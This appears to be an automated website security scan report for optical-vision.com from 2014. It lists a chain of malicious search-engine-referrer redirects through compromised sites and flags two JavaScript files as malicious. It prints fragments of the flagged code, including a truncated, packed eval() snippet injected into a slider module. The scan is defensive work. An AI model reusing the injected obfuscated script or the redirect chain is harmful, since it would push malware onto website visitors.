Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://optical-vision.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: optical-vision.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 12 Jul 2014 19:50:27 GMT Location: http://chilli-recipes.com/administrator/includes/joomla.php Server: Apache Content-Length: 0 Content-Type: text/html | malicious |
URL: http://chilli-recipes.com/administrator/includes/joomla.php (imitation of visitor from search engine) GET /administrator/includes/joomla.php HTTP/1.1 Host: chilli-recipes.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 19:50:29 GMT Location: http://www.haphuongfoundation.net/vietnam/language/pdf_fonts/www/all2.php Server: Apache/2.4.9 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
URL: http://www.haphuongfoundation.net/vietnam/language/pdf_fonts/www/all2.php (imitation of visitor from search engine) GET /vietnam/language/pdf_fonts/www/all2.php HTTP/1.1 Host: www.haphuongfoundation.net Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 19:50:29 GMT Location: http://it-rise.ru/includes/domit/1.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://optical-vision.com/ | 200 OK Content-Length: 53096 Content-Type: text/html | clean |
http://www.optical-vision.com/templates/ja_helio/js/global.js | 200 OK Content-Length: 2695 Content-Type: application/javascript | clean |
http://www.optical-vision.com/templates/ja_helio/js/swfobject.js | 200 OK Content-Length: 7858 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object(); deconcept.SWFObject = function(swf, id, w, h, ver, c, wmode, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){ if (!document.createElement || !document.getElementById) { return; } this.DETECT_KEY = detectKey ? detectKey : 'detectfla if (q.length > 1 && startIndex > -1) { return q.substring(q.indexOf("=", startIndex)+1, endIndex); } } return ""; } } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject;
Antivirus reports:
http://optical-vision.com/modules/mod_yoo_slider/mod_yoo_slider.js | 200 OK Content-Length: 1728 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c u=t T({R:5(7,4,2){0.W({q:\'n\',6:\'D\',a:Y,b:X,h:L,f:x.M.N.K},2);0.7=$(7);0.4=$$(4);0.k=t x.P(0.4,{J:G,I:H,f:0.2.f});8(0.2.q!=\'n\')0.2.6=\'z\';0.2.a=O.11(0.2.b-(
Antivirus reports:
http://optical-vision.com/plugins/system/pc_includes/ajax.js | 200 OK Content-Length: 7115 Content-Type: application/javascript | clean |
http://www.optical-vision.com/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 56052 Content-Type: text/javascript | clean |
http://optical-vision.com/templates/ja_helio/js/ja.script.js | 200 OK Content-Length: 6352 Content-Type: application/javascript | clean |
http://optical-vision.com/templates/ja_helio/ja_menus/ja_moomenu/ja.moomenu.js | 200 OK Content-Length: 5298 Content-Type: application/javascript | clean |
http://www.optical-vision.com/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 35310 Content-Type: text/javascript | clean |
http://www.optical-vision.com/modules/mod_virtuemart/vm_transmenu/transmenu.js | 200 OK Content-Length: 33566 Content-Type: application/javascript | clean |
http://optical-vision.com/index.php?option=com_content&view=article&id=52&Itemid=53 | 200 OK Content-Length: 35123 Content-Type: text/html | clean |
http://optical-vision.com/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/javascript | clean |
http://optical-vision.com/plugins/content/ja_tabs/ja_tabs.js | 200 OK Content-Length: 6704 Content-Type: application/javascript | clean |
http://optical-vision.com/index.php?option=com_content&view=article&id=53&Itemid=54 | 200 OK Content-Length: 34196 Content-Type: text/html | clean |
http://optical-vision.com/index.php?option=com_contact&view=contact&id=1&Itemid=55 | 200 OK Content-Length: 36415 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=optical-vision.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://optical-vision.com/
Result: optical-vision.com is not infected or malware details are not published yet.